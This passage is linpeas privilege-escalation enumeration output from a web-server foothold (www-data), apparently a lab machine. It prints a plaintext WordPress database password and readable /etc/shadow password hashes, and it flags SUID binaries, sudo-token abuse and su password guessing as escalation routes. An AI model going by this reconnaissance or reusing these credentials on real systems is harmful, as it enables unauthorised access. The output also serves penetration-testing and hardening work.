Analysis (T1016) + +══╣ Iptables Rules (T1016) +No permission to list iptables rules + +══╣ Nftables Rules (T1016) +nftables Not Found + +══╣ Firewalld Rules (T1016) +firewalld Not Found + +══╣ UFW Rules (T1016) +ufw Not Found + +══╣ Forwarding and rp_filter (T1016) +net.ipv4.ip_forward = 0 +net.ipv6.conf.all.forwarding = 0 +net.ipv4.conf.all.rp_filter = 0 + +╔══════════╣ Inetd/Xinetd Services Analysis (T1049) + +══╣ Inetd Services (T1049) +inetd Not Found + +══╣ Xinetd Services (T1049) +xinetd Not Found + +══╣ Running Inetd/Xinetd Services (T1049) + +Active Services (from ss): + +Running Service Processes: + +╔══════════╣ Internet Access? (T1016,T1590) +DNS is not accessible +Port 443 is not accessible +ICMP is not accessible +Port 80 is not accessible +Port 443 is not accessible with curl + +══╣ Proxy discovery (T1016,T1590) +╚ Checking common proxy env vars and apt proxy config + + + + ╔═══════════════════╗ +═══════════════════════════════╣ Users Information ╠═══════════════════════════════ + ╚═══════════════════╝ +╔══════════╣ My user (T1033) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +╔══════════╣ PGP Keys and Related Files (T1552.004) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys +GPG: +GPG is installed, listing keys: + +NetPGP: +netpgpkeys Not Found + +PGP Related Files: + +╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d (T1548.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid + + +╔══════════╣ Checking sudo tokens (T1548.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens +ptrace protection is disabled (0), so sudo tokens could be abused + +doas.conf Not Found + +╔══════════╣ Checking Pkexec and Polkit (T1548.003,T1548.004,T1068) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2 + +══╣ Polkit Binary (T1548.003,T1068) + +══╣ Polkit Policies (T1548.003) + +══╣ Polkit Authentication Agent (T1548.004) + +╔══════════╣ Superusers and UID 0 Users (T1087.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html + +══╣ Users with UID 0 in /etc/passwd (T1087.001) +root:x:0:0:root:/root:/bin/bash + +══╣ Users with sudo privileges in sudoers (T1087.001) + +╔══════════╣ Users with console (T1087.001) +root:x:0:0:root:/root:/bin/bash +user:x:1000:1000:user,,,:/home/user:/bin/bash + +╔══════════╣ All users & groups (T1087.001,T1069.001) +uid=0(root) gid=0(root) groups=0(root) +uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) +uid=10(uucp) gid=10(uucp) groups=10(uucp) +uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) +uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) +uid=1001(baldur) gid=1001(baldur) groups=1001(baldur) +uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network) +uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) +uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy) +uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) +uid=105(messagebus) gid=109(messagebus) groups=109(messagebus) +uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup) +uid=107(mysql) gid=111(mysql) groups=111(mysql) +uid=108(ftp) gid=112(ftp) groups=112(ftp) +uid=109(smmta) gid=114(smmta) groups=114(smmta) +uid=110(smmsp) gid=115(smmsp) groups=115(smmsp) +uid=13(proxy) gid=13(proxy) groups=13(proxy) +uid=2(bin) gid=2(bin) groups=2(bin) +uid=3(sys) gid=3(sys) groups=3(sys) +uid=33(www-data) gid=33(www-data) groups=33(www-data) +uid=34(backup) gid=34(backup) groups=34(backup) +uid=38(list) gid=38(list) groups=38(list) +uid=39(irc) gid=39(irc) groups=39(irc) +uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) +uid=41(gnats) gid=41(gnats) groups=41(gnats) +uid=5(games) gid=60(games) groups=60(games) +uid=6(man) gid=12(man) groups=12(man) +uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) +uid=7(lp) gid=7(lp) groups=7(lp) +uid=8(mail) gid=8(mail) groups=8(mail) +uid=9(news) gid=9(news) groups=9(news) + +╔══════════╣ Currently Logged in Users (T1033) + +══╣ Basic user information (T1033) + 15:32:33 up 2:03, 0 users, load average: 0.54, 0.18, 0.06 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + +══╣ Active sessions (T1033) + 15:32:33 up 2:03, 0 users, load average: 0.54, 0.18, 0.06 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + +══╣ Logged in users (utmp) (T1033) + system boot May 8 13:29 +LOGIN tty1 May 8 13:29 674 id=tty1 + run-level 5 May 8 13:32 + +══╣ SSH sessions (T1033) + +══╣ Screen sessions (T1033) + +══╣ Tmux sessions (T1033) + +╔══════════╣ Last Logons and Login History (T1033) + +══╣ Last logins (T1033) +reboot system boot 4.9.0-13-amd64 Fri May 8 13:29 still running + +wtmp begins Fri May 8 13:29:35 2026 + +══╣ Failed login attempts (T1033) + +══╣ Recent logins from auth.log (limit 20) (T1033) + +══╣ Last time logon each user (T1033) +Username Port From Latest + +╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...) + +╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! + +╔══════════╣ Actual Group Memberships via newgrp (T1069.001) + + + + ╔══════════════════════╗ +═════════════════════════════╣ Software Information ╠═════════════════════════════ + ╚══════════════════════╝ +╔══════════╣ Useful software (T1082) +/usr/bin/base64 +/usr/bin/curl +/usr/bin/make +/bin/nc +/bin/nc.traditional +/bin/netcat +/usr/bin/perl +/usr/bin/php +/bin/ping +/usr/bin/python +/usr/bin/python2 +/usr/bin/python2.7 +/usr/bin/python3 +/usr/bin/socat +/usr/bin/sudo +/usr/bin/wget + +╔══════════╣ Installed Compilers (T1587.001) + +╔══════════╣ Analyzing Apache-Nginx Files (limit 70) +Apache version: Server version: Apache/2.4.25 (Debian) +Server built: 2019-10-13T15:43:54 +httpd Not Found + +Nginx version: nginx Not Found + +/etc/apache2/mods-enabled/php7.0.conf- +/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php +-- +/etc/apache2/mods-enabled/php7.0.conf- +/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php-source +-- +/etc/apache2/mods-available/php7.0.conf- +/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php +-- +/etc/apache2/mods-available/php7.0.conf- +/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php-source +══╣ PHP exec extensions +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/apache2/sites-enabled +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/apache2/sites-enabled +-rw-r--r-- 1 root root 1327 May 6 11:17 /etc/apache2/sites-enabled/000-default.conf + + ServerAdmin webmaster@localhost + DocumentRoot /var/www + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined + + + +-rw-r--r-- 1 root root 1332 May 6 11:17 /etc/apache2/sites-available/000-default.conf + + ServerAdmin webmaster@localhost + DocumentRoot /var/www/html + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined + +-rw-r--r-- 1 root root 1327 May 6 11:17 /etc/apache2/sites-enabled/000-default.conf + + ServerAdmin webmaster@localhost + DocumentRoot /var/www + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined + + +-rw-r--r-- 1 root root 71537 May 6 11:17 /etc/php/7.0/apache2/php.ini +allow_url_fopen = On +allow_url_include = Off +odbc.allow_persistent = On +ibase.allow_persistent = 1 +mysqli.allow_persistent = On +pgsql.allow_persistent = On +-rw-r--r-- 1 root root 71194 May 6 11:17 /etc/php/7.0/cli/php.ini +allow_url_fopen = On +allow_url_include = Off +odbc.allow_persistent = On +ibase.allow_persistent = 1 +mysqli.allow_persistent = On +pgsql.allow_persistent = On + + + +╔══════════╣ Browser Profiles (T1539,T1217) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#browser-data + +╔══════════╣ Analyzing MariaDB Files (limit 70) +-rw-r--r-- 1 root root 869 May 6 11:17 /etc/mysql/mariadb.cnf +[client-server] +!includedir /etc/mysql/conf.d/ +!includedir /etc/mysql/mariadb.conf.d/ + +-rw------- 1 root root 277 May 6 11:17 /etc/mysql/debian.cnf + +╔══════════╣ Analyzing Wordpress Files (limit 70) +-rw-r--r-- 1 root root 2381 May 6 11:17 /usr/share/wordpress/wp-config.php +$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']); +if (!defined('DB_NAME')) + define('DB_NAME', 'wordpress'); +if (!defined('DB_USER')) + define('DB_USER', 'wordpress'); +if (!defined('DB_HOST')) + define('DB_HOST', 'localhost'); +-rw-r--r-- 1 www-data www-data 3032 May 6 11:17 /var/www/yggdrasil/wp-config.php +define( 'DB_NAME', 'wordpress' ); +define( 'DB_USER', 'wordpress' ); +define( 'DB_PASSWORD', 'JXakuf5DzA3q7nnj' ); +define( 'DB_HOST', 'localhost' ); +$currenthost = "http://".$_SERVER['HTTP_HOST']; +$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME'])); + +╔══════════╣ Analyzing Rsync Files (limit 70) +-rw-r--r-- 1 root root 1044 May 6 11:17 /usr/share/doc/rsync/examples/rsyncd.conf +[ftp] + comment = public archive + path = /var/www/pub + use chroot = yes + lock file = /var/lock/rsyncd + read only = yes + list = yes + uid = nobody + gid = nogroup + strict modes = yes + ignore errors = no + ignore nonreadable = yes + transfer logging = no + timeout = 600 + refuse options = checksum dry-run + dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz + + +╔══════════╣ Analyzing PAM Auth Files (limit 70) +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/pam.d +ICMP is not accessible +-rw-r--r-- 1 root root 2133 May 6 11:17 /etc/pam.d/sshd +account required pam_nologin.so +session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close +session required pam_loginuid.so +session optional pam_keyinit.so force revoke +session optional pam_motd.so motd=/run/motd.dynamic +session optional pam_motd.so noupdate +session optional pam_mail.so standard noenv # [1] +session required pam_limits.so +session required pam_env.so # [1] +session required pam_env.so user_readenv=1 envfile=/etc/default/locale +session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open + +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/pam.d +-rw-r--r-- 1 root root 143 May 6 11:17 /etc/pam.d/runuser +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 317 May 6 11:17 /etc/pam.d/systemd-user +-rw-r--r-- 1 root root 95 May 6 11:17 /etc/pam.d/sudo +-rw-r--r-- 1 root root 2133 May 6 11:17 /etc/pam.d/sshd +-rw-r--r-- 1 root root 1440 May 6 11:17 /etc/pam.d/common-password +password required pam_permit.so +-rw-r--r-- 1 root root 92 May 6 11:17 /etc/pam.d/newusers +-rw-r--r-- 1 root root 2257 May 6 11:17 /etc/pam.d/su +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 454 May 6 11:17 /etc/pam.d/smtp +-rw-r--r-- 1 root root 92 May 6 11:17 /etc/pam.d/passwd +-rw-r--r-- 1 root root 606 May 6 11:17 /etc/pam.d/cron +-rw-r--r-- 1 root root 1189 May 6 11:17 /etc/pam.d/common-session +session [default=1] pam_permit.so +session required pam_permit.so +-rw-r--r-- 1 root root 138 May 6 11:17 /etc/pam.d/runuser-l +-rw-r--r-- 1 root root 4945 May 6 11:17 /etc/pam.d/login +-rw-r--r-- 1 root root 319 May 6 11:17 /etc/pam.d/vsftpd +-rw-r--r-- 1 root root 384 May 6 11:17 /etc/pam.d/chfn +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 1154 May 6 11:17 /etc/pam.d/common-session-noninteractive +session [default=1] pam_permit.so +session required pam_permit.so +-rw-r--r-- 1 root root 1208 May 6 11:17 /etc/pam.d/common-account +account required pam_permit.so +-rw-r--r-- 1 root root 581 May 6 11:17 /etc/pam.d/chsh +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 1221 May 6 11:17 /etc/pam.d/common-auth +auth [success=1 default=ignore] pam_unix.so nullok_secure +auth required pam_permit.so +-rw-r--r-- 1 root root 92 May 6 11:17 /etc/pam.d/chpasswd +-rw-r--r-- 1 root root 119 May 6 11:17 /etc/pam.d/vmtoolsd +-rw-r--r-- 1 root root 520 May 6 11:17 /etc/pam.d/other + + +╔══════════╣ Analyzing Ldap Files (limit 70) +The password hash is from the {SSHA} to 'structural' +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/ldap + +drwxr-xr-x 2 root root 4096 May 6 11:17 /usr/share/sendmail/examples/ldap + + +╔══════════╣ Analyzing Keyring Files (limit 70) +drwxr-xr-x 2 root root 4096 May 6 11:17 /usr/share/keyrings + + + + +╔══════════╣ Analyzing Postfix Files (limit 70) +-rw-r--r-- 1 root root 0 May 6 11:17 /etc/aliases +lrwxrwxrwx 1 root smmsp 10 May 6 11:13 /etc/mail/aliases -> ../aliases +-rw-r--r-- 1 root root 2176 May 6 11:17 /usr/share/X11/xkb/keycodes/aliases +-rw-r--r-- 1 root root 9758 May 6 11:17 /usr/share/mime/aliases +-rw-r--r-- 1 root root 233 May 6 11:17 /usr/share/sendmail/examples/db/aliases + +-rw-r--r-- 1 root root 694 May 6 11:17 /usr/share/bash-completion/completions/postfix + + +╔══════════╣ Analyzing Proxy Config Files (limit 70) +-rw-r--r-- 1 root root 0 May 6 11:17 /etc/environment + + + +╔══════════╣ Analyzing FTP Files (limit 70) +-rw-r--r-- 1 root root 5903 May 6 11:17 /etc/vsftpd.conf +anonymous_enable=YES +local_enable +#write_enable=YES +#anon_upload_enable=YES +#anon_mkdir_write_enable=YES +#chown_uploads=YES +#chown_username=whoever +anon_root=/home/baldur/Uploads +-rw-r--r-- 1 root root 41 May 6 11:17 /usr/lib/tmpfiles.d/vsftpd.conf +-rw-r--r-- 1 root root 506 May 6 11:17 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf +anonymous_enable +local_enable +write_enable +anon_upload_enable +anon_mkdir_write_enable +anon_other_write_enable +-rw-r--r-- 1 root root 564 May 6 11:17 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf +anonymous_enable +local_enable +write_enable +anon_upload_enable +anon_mkdir_write_enable +anon_other_write_enable +-rw-r--r-- 1 root root 260 May 6 11:17 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf +anonymous_enable +local_enable=YES +write_enable +anon_upload_enable +anon_mkdir_write_enable +anon_other_write_enable + + + +-rw-r--r-- 1 root root 69 May 6 11:17 /etc/php/7.0/mods-available/ftp.ini +-rw-r--r-- 1 root root 69 May 6 11:17 /usr/share/php7.0-common/common/ftp.ini + + + + + + +╔══════════╣ Analyzing Other Interesting Files (limit 70) +-rw-r--r-- 1 root root 3526 May 6 11:17 /etc/skel/.bashrc +-rw-r--r-- 1 user user 3526 May 6 11:17 /home/user/.bashrc + + + + + +-rw-r--r-- 1 root root 675 May 6 11:17 /etc/skel/.profile +-rw-r--r-- 1 user user 675 May 6 11:17 /home/user/.profile + + + + +╔══════════╣ Analyzing Windows Files (limit 70) + + + + + + + + + + + + + + + + + + + + + + +lrwxrwxrwx 1 root root 22 May 6 11:12 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf +lrwxrwxrwx 1 root root 24 May 6 11:12 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf +-rw-r--r-- 1 root root 83 May 6 11:17 /var/lib/dpkg/alternatives/my.cnf + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +╔══════════╣ Searching mysql credentials and exec (T1552.001) +From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: user = mysql +Found readable /etc/mysql/my.cnf +[client-server] +!includedir /etc/mysql/conf.d/ +!includedir /etc/mysql/mariadb.conf.d/ + +╔══════════╣ MySQL version (T1552.001) +mysql Ver 15.1 Distrib 10.1.45-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2 + + +═╣ MySQL connection using default root/root ........... No +═╣ MySQL connection using root/toor ................... No +═╣ MySQL connection using root/NOPASS ................. No + +MySQL is running as user 'mysql' with version 10.1.45. +╔══════════╣ Analyzing PGP-GPG Files (limit 70) +/usr/bin/gpg +gpg Not Found +netpgpkeys Not Found +netpgp Not Found + +-rw-r--r-- 1 root root 8748 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg +-rw-r--r-- 1 root root 8757 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg +-rw-r--r-- 1 root root 2469 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg +-rw-r--r-- 1 root root 8176 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg +-rw-r--r-- 1 root root 8185 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg +-rw-r--r-- 1 root root 2344 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg +-rw-r--r-- 1 root root 5138 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg +-rw-r--r-- 1 root root 5147 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg +-rw-r--r-- 1 root root 2775 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg +-rw-r--r-- 1 root root 7483 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg +-rw-r--r-- 1 root root 7492 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg +-rw-r--r-- 1 root root 2275 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg + + + + + + + + + +╔══════════╣ Checking for PackageKit Pack2TheRoot (CVE-2026-41651) (T1068) +╚ https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html +PackageKit Not Found + + +╔══════════╣ Searching uncommon passwd files (splunk) (T1552.001) +passwd file: /etc/pam.d/passwd +passwd file: /etc/passwd +passwd file: /usr/share/bash-completion/completions/passwd +passwd file: /usr/share/lintian/overrides/passwd + +╔══════════╣ Searching ssl/ssh files (T1552.004,T1021.004) +╔══════════╣ Analyzing SSH Files (limit 70) + + + + + +-rw-r--r-- 1 root root 604 May 6 11:17 /etc/ssh/mgmt_ssh_host_dsa_key.pub +-rw-r--r-- 1 root root 176 May 6 11:17 /etc/ssh/mgmt_ssh_host_ecdsa_key.pub +-rw-r--r-- 1 root root 96 May 6 11:17 /etc/ssh/mgmt_ssh_host_ed25519_key.pub +-rw-r--r-- 1 root root 396 May 6 11:17 /etc/ssh/mgmt_ssh_host_rsa_key.pub +-rw-r--r-- 1 root root 604 May 6 11:17 /etc/ssh/ssh_host_dsa_key.pub +-rw-r--r-- 1 root root 176 May 6 11:17 /etc/ssh/ssh_host_ecdsa_key.pub +-rw-r--r-- 1 root root 96 May 6 11:17 /etc/ssh/ssh_host_ed25519_key.pub +-rw-r--r-- 1 root root 396 May 6 11:17 /etc/ssh/ssh_host_rsa_key.pub + +ChallengeResponseAuthentication no +UsePAM yes +══╣ Some certificates were found (out limited): (T1552.004,T1021.004) +/etc/mail/tls/sendmail-client.crt +/etc/mail/tls/sendmail-server.crt +/etc/ssl/certs/ACCVRAIZ1.pem +/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem +/etc/ssl/certs/Actalis_Authentication_Root_CA.pem +/etc/ssl/certs/AffirmTrust_Commercial.pem +/etc/ssl/certs/AffirmTrust_Networking.pem +/etc/ssl/certs/AffirmTrust_Premium.pem +/etc/ssl/certs/AffirmTrust_Premium_ECC.pem +/etc/ssl/certs/Amazon_Root_CA_1.pem +/etc/ssl/certs/Amazon_Root_CA_2.pem +/etc/ssl/certs/Amazon_Root_CA_3.pem +/etc/ssl/certs/Amazon_Root_CA_4.pem +/etc/ssl/certs/Atos_TrustedRoot_2011.pem +/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem +/etc/ssl/certs/Baltimore_CyberTrust_Root.pem +/etc/ssl/certs/Buypass_Class_2_Root_CA.pem +/etc/ssl/certs/Buypass_Class_3_Root_CA.pem +/etc/ssl/certs/CA_Disig_Root_R2.pem +/etc/ssl/certs/CFCA_EV_ROOT.pem +/etc/mail/tls/sendmail-client.csr +/etc/mail/tls/sendmail-server.csr + +══╣ Some SSH Agent files were found: (T1552.004,T1021.004) +/run/systemd/generator.late/graphical.target.wants/qemu-guest-agent.service +/run/systemd/generator.late/multi-user.target.wants/qemu-guest-agent.service +/run/systemd/generator.late/qemu-guest-agent.service + +══╣ Some home ssh config file was found (T1552.004,T1021.004) +/usr/share/openssh/sshd_config +ChallengeResponseAuthentication no +UsePAM yes +X11Forwarding yes +PrintMotd no +AcceptEnv LANG LC_* +Subsystem sftp /usr/lib/openssh/sftp-server + +══╣ /etc/hosts.allow file found, trying to read the rules: (T1552.004,T1021.004) +/etc/hosts.allow + + +Searching inside /etc/ssh/ssh_config for interesting info +Host * + SendEnv LANG LC_* + HashKnownHosts yes + GSSAPIAuthentication yes + + + + + ╔════════════════════════════════════╗ +══════════════════════╣ Files with Interesting Permissions ╠══════════════════════ + ╚════════════════════════════════════╝ +╔══════════╣ SUID - Check easy privesc, exploits and write perms (T1548.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid +strings Not Found +strace Not Found +-rwsr-xr-x 1 root root 60K May 6 11:17 /bin/ping +-rwsr-xr-x 1 root root 40K May 6 11:17 /bin/su +-rwsr-xr-x 1 root root 44K May 6 11:17 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 +-rwsr-xr-x 1 root root 31K May 6 11:17 /bin/umount ---> BSD/Linux(08-1996) +-rwsr-xr-x 1 root root 31K May 6 11:17 /bin/fusermount +-rwsr-xr-x 1 root root 10K May 6 11:17 /usr/sbin/sensible-mda (Unknown SUID binary!) +-rwsr-sr-x 1 root mail 92K May 6 11:17 /usr/bin/procmail +-rwsr-xr-x 1 root root 138K May 6 11:17 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable +-rwsr-xr-x 1 root root 59K May 6 11:17 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) +-rwsr-xr-x 1 root root 75K May 6 11:17 /usr/bin/gpasswd +-rwsr-xr-x 1 root root 49K May 6 11:17 /usr/bin/chfn ---> SuSE_9.3/10 +-rwsr-xr-x 1 root root 40K May 6 11:17 /usr/bin/chsh +-rwsr-xr-x 1 root root 40K May 6 11:17 /usr/bin/newgrp ---> HP-UX_10.20 +-rwsr-xr-- 1 root messagebus 42K May 6 11:17 /usr/lib/dbus-1.0/dbus-daemon-launch-helper +-rwsr-xr-x 1 root root 10K May 6 11:17 /usr/lib/eject/dmcrypt-get-device +-rwsr-xr-x 1 root root 431K May 6 11:17 /usr/lib/openssh/ssh-keysign + +╔══════════╣ SGID (T1548.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid +-rwxr-sr-x 1 root shadow 35K May 6 11:17 /sbin/unix_chkpwd +-rwxr-sr-x 1 root shadow 23K May 6 11:17 /usr/bin/expiry +-rwxr-sr-x 1 root ssh 351K May 6 11:17 /usr/bin/ssh-agent +-rwxr-sr-x 3 root mail 15K May 6 11:17 /usr/bin/mail-unlock +-rwsr-sr-x 1 root mail 92K May 6 11:17 /usr/bin/procmail +-rwxr-sr-x 1 root mail 19K May 6 11:17 /usr/bin/lockfile +-rwxr-sr-x 1 root tty 27K May 6 11:17 /usr/bin/wall +-rwxr-sr-x 1 root crontab 40K May 6 11:17 /usr/bin/crontab +-rwxr-sr-x 3 root mail 15K May 6 11:17 /usr/bin/mail-touchlock +-rwxr-sr-x 1 root mail 19K May 6 11:17 /usr/bin/dotlockfile +-rwxr-sr-x 3 root mail 15K May 6 11:17 /usr/bin/mail-lock +-rwxr-sr-x 1 root shadow 71K May 6 11:17 /usr/bin/chage +-rwxr-sr-x 1 root tty 15K May 6 11:17 /usr/bin/bsd-write +-rwxr-sr-x 1 root smmsp 833K May 6 11:17 /usr/lib/sm.bin/sendmail ---> Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_(SGI_ProPack_1.2/1.3) +-rwxr-sr-x 1 root smmsp 77K May 6 11:17 /usr/lib/sm.bin/mailstats (Unknown SGID binary) + +╔══════════╣ Files with ACLs (limited to 50) (T1222) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls +files with acls in searched folders Not Found + +╔══════════╣ Capabilities (T1548.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities +══╣ Current shell capabilities (T1548.001) +CapInh: 0000000000000000 +CapPrm: 0000000000000000 +CapEff: 0000000000000000 +CapBnd: 0000003fffffffff +CapAmb: 0000000000000000 + +══╣ Parent proc capabilities (T1548.001) +CapInh: 0000000000000000 +CapPrm: 0000000000000000 +CapEff: 0000000000000000 +CapBnd: 0000003fffffffff +CapAmb: 0000000000000000 + + +Files with capabilities (limited to 50): + +╔══════════╣ Checking misconfigurations of ld.so (T1574.006) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso +/etc/ld.so.conf +Content of /etc/ld.so.conf: +include /etc/ld.so.conf.d/*.conf + +/etc/ld.so.conf.d + /etc/ld.so.conf.d/libc.conf + - /usr/local/lib + /etc/ld.so.conf.d/x86_64-linux-gnu.conf + - /lib/x86_64-linux-gnu + - /usr/lib/x86_64-linux-gnu + +/etc/ld.so.preload +╔══════════╣ Files (scripts) in /etc/profile.d/ (T1546.004) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files +total 12 +drwxr-xr-x 2 root root 4096 May 6 11:17 . +drwxr-xr-x 85 root root 4096 May 6 11:17 .. +-rw-r--r-- 1 root root 663 May 6 11:17 bash_completion.sh + +╔══════════╣ Permissions in init, init.d, systemd, and rc.d (T1543.002) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd + +╔══════════╣ AppArmor binary profiles (T1518.001) +-rw-r--r-- 1 root root 730 May 6 11:17 usr.sbin.mysqld + +═╣ Hashes inside passwd file? ........... No +═╣ Writable passwd file? ................ No +═╣ Credentials in fstab/mtab? ........... No +═╣ Can I read shadow files? ............. root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:20579:0:99999:7::: +daemon:*:17569:0:99999:7::: +bin:*:17569:0:99999:7::: +sys:*:17569:0:99999:7::: +sync:*:17569:0:99999:7::: +games:*:17569:0:99999:7::: +man:*:17569:0:99999:7::: +lp:*:17569:0:99999:7::: +mail:*:17569:0:99999:7::: +news:*:17569:0:99999:7::: +uucp:*:17569:0:99999:7::: +proxy:*:17569:0:99999:7::: +www-data:*:17569:0:99999:7::: +backup:*:17569:0:99999:7::: +list:*:17569:0:99999:7::: +irc:*:17569:0:99999:7::: +gnats:*:17569:0:99999:7::: +nobody:*:17569:0:99999:7::: +systemd-timesync:*:17569:0:99999:7::: +systemd-network:*:17569:0:99999:7::: +systemd-resolve:*:17569:0:99999:7::: +systemd-bus-proxy:*:17569:0:99999:7::: +_apt:*:17569:0:99999:7::: +messagebus:*:17569:0:99999:7::: +sshd:*:17569:0:99999:7::: +user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:17569:0:99999:7::: +mysql:!:20579:0:99999:7::: +ftp:*:20579:0:99999:7::: +smmta:*:20579:0:99999:7::: +smmsp:*:20579:0:99999:7::: +baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:20579:0:99999:7::: +═╣ Can I read shadow plists? ............ No +═╣ Can I write shadow plists? ........... No +═╣ Can I read opasswd file? ............. No +═╣ Can I write in network-scripts? ...... No +═╣ Can I read root folder? .............. No + +╔══════════╣ Searching root files in home dirs (limit 30) (T1083) +/home/ +/home/baldur +/home/baldur/Uploads +/home/baldur/Uploads/todo.txt +/root/ +/var/www +/var/www/html +/var/www/html/index.html + +╔══════════╣ Searching folders owned by me containing others files on it (limit 100) (T1083) + +╔══════════╣ Readable files belonging to root and readable by me but not world readable (T1083) + +╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200) (T1574.009,T1574.010) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files +/run/lock +/run/lock/apache2 +/run/sendmail/mta/smsocket +/tmp +/tmp/cf31-probe-2649.py +/tmp/linpeas.sh +/tmp/out.txt 